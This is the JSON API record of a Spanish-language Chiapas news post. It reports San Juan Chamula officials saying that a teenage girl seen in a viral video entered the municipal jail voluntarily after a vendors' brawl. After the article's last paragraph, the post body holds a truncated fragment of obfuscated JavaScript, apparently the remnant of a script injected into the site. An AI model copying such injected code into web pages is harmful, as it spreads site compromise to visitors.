{"id":9808,"date":"2023-04-29T01:09:20","date_gmt":"2023-04-29T01:09:20","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=9808"},"modified":"2023-04-29T01:09:21","modified_gmt":"2023-04-29T01:09:21","slug":"menor-de-edad-no-fue-encarcelada","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=9808","title":{"rendered":"Menor de edad no fue encarcelada"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"560\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/04\/WhatsApp-Image-2023-04-27-at-7.48.02-PM-1-1024x560.jpeg\" alt=\"\" class=\"wp-image-9809\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/04\/WhatsApp-Image-2023-04-27-at-7.48.02-PM-1-1024x560.jpeg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/04\/WhatsApp-Image-2023-04-27-at-7.48.02-PM-1-300x164.jpeg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/04\/WhatsApp-Image-2023-04-27-at-7.48.02-PM-1-768x420.jpeg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/04\/WhatsApp-Image-2023-04-27-at-7.48.02-PM-1.jpeg 1382w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>\u00d3scar G\u00f3mez\/Corresponsal<\/p>\n\n\n\n<p>San Crist\u00f3bal de Las Casas.- Autoridades del ayuntamiento de San Juan Chamula dieron a conocer que la menor de edad la cual ha circulado en redes sociales fue encarcelada, se debi\u00f3 a que no quiso separarse de sus familiares, quienes minutos antes hab\u00edan protagonizado una ri\u00f1a&nbsp; con comerciantes establecidos del Mercado Publico de la cabecera de aquel municipio de Tostsil.<\/p>\n\n\n\n<p>De acuerdo a fuentes consultadas, se supo que dos grupos de comerciantes, por un lado ambulantes y por el otro establecidos en el Mercado Publico, protagonizaron una ri\u00f1a, ya que los ambulantes no respetaron los l\u00edmites donde les es permitido vender, esto de acuerdo a sus usos y costumbres, a la cual el municipio o ayuntamiento no determina, pues ya es un acuerdo por parte de autoridades tradicionales.<\/p>\n\n\n\n<p>Los hombres en su mayor\u00eda se confrontaron, pero la joven de entre 15 y 16 a\u00f1os, no de 12 como ha circulado en redes sociales, fueron llevados a la c\u00e1rcel municipal por los mayoles o polic\u00edas tradicionales para evitar que pasara a mayores, sin embargo, la joven menor de edad, no quiso separarse de sus familiares, y por si sola ingreso a los separos.<\/p>\n\n\n\n<p>En la presidencia se encontraba \u00fanicamente el 5\u00ba regidor, ya que la gran mayor\u00eda de autoridades se encontraban en eventos de comunidades, quienes al ser enterados dieron las instrucciones de que fueran sacados de los separados y resolver el tema de manera cordial, sin embargo alguien grab\u00f3 un video que fue difundido, indicando que una ni\u00f1a estaba encarcelada, pero sin saber que ella fue la que por s\u00ed sola ingreso.<\/p>\n\n\n\n<p>De acuerdo a las versiones difundidas, la menor \u00fanicamente permaneci\u00f3 en la c\u00e1rcel por espacio de 10 a 15 minutos, por su propia voluntad, ante el temor de que otros familiares de la otra parte la agredieran, lo cual ayud\u00f3 adem\u00e1s a calmar los \u00e1nimos de las partes conflictivas.<\/p>\n\n\n\n<p>El regidor ofreci\u00f3 una disculpa p\u00fablica, ya que jam\u00e1s intent\u00f3 violentar los derechos de la menor, y por el contrario busc\u00f3 en todo momento salvaguardar su integridad, sin embargo, en redes sociales, fue se\u00f1alado de lo contrario.<\/p>\n\n\n\n<p>Las partes en conflicto llegaron a buenos t\u00e9rminos, comprometi\u00e9ndose a respetarse mutuamente, y sobre todo a respetar las reglas de la venta como ambulantes en la cabecera municipal, pues esas fueron determinadas por autoridades tradicionales, no por el ayuntamiento municipal.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u00d3scar G\u00f3mez\/Corresponsal San Crist\u00f3bal de Las Casas.- Autoridades del ayuntamiento de San Juan Chamula dieron a conocer que la menor de edad la cual ha circulado en redes sociales fue encarcelada, se debi\u00f3 a que no quiso separarse de sus familiares, quienes minutos antes hab\u00edan protagonizado una ri\u00f1a&nbsp; con comerciantes establecidos del Mercado Publico de &hellip;<\/p>\n","protected":false},"author":2,"featured_media":9809,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-9808","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/9808","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=9808"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/9808\/revisions"}],"predecessor-version":[{"id":9810,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/9808\/revisions\/9810"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/9809"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=9808"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=9808"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=9808"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}